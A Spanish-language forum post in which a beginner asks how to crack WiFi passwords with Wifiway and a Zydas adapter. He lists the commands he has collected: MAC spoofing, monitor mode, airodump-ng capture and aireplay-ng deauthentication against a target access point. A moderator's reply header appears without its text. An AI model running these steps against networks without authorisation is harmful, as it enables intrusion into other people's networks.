alvarogemelo

|
 |
« en: 10-Junio 19:52:55 (Domingo) » |
|
Bueno soy novatillo en esto y quisera instalar el wifiway y con la usb zydas poder sacar alguna contraseña pero sin animo de lucro por curiosidad porque a mi stas cosas de vulnerabilidad me gustan mucho pero no se como empezar,no hay algun minitutorial para realizarlo? e visto post pero no tengo ni idea de cuales son los primeros pasos,si debo conecatr el wifiway con la usb metida,que comandos debo poner,que programas usar para la inyeccion y sacar la contraseña(aircrak,zydasinyected..),las librerias si hay que poner alguna,pero es que no se como hacer todo esto bueno la instalacion no habia problema pero eso si una vez en el entrono windows de linux hay ya no se que hacer, me podeis decir los pasos a seguir ahora Si tengo que bajarme algun programilla me lo podriais decir? una vez dentro del wifiway le doy a interent y no me conecta,porque?si en windows si que funciona
Esto es lo que e podido recopilar de informacion : Primero creo que debo poner esto en la consola de comando-->poner ifconfig eth1 down o iwconfig
Otro paso es Cambiar la mac:
ifconfig eth1 down macchanger --mac=00:11:22:33:44:55 eth1 ifconfig eth1 up iwconfig eth1 mode monitor channel el_que_sea rate 1M
Luego Poner el airodump: airodump-ng eth1 -c el_que_sea --bssid MAC_AP -w nombre_fichero_capturas
Y para asociarme: aireplay-ng -0 30 -e ESSID -a MAC_AP -h 00:11:22:33:44:55 eth1
Pero si el nivel de señal no es relativamente bueno, no asocia. Se Puede probar la opción -o que A veces funciona mejor:
aireplay-ng -0 30 -o 1 -e ESSID -a MAC_AP -h 00:11:22:33:44:55 eth1
Alguien me puede orientar? thanks
|
|
|
|
« Última modificación: 10-Junio 20:32:06 (Domingo) por alvarogemelo »
|
|
|
|
|
|
|
|
|
ChimoC
Moderador Global

|
 |
« Respuesta #3 en: 11-Junio 13:32:08 (Lunes) » |
|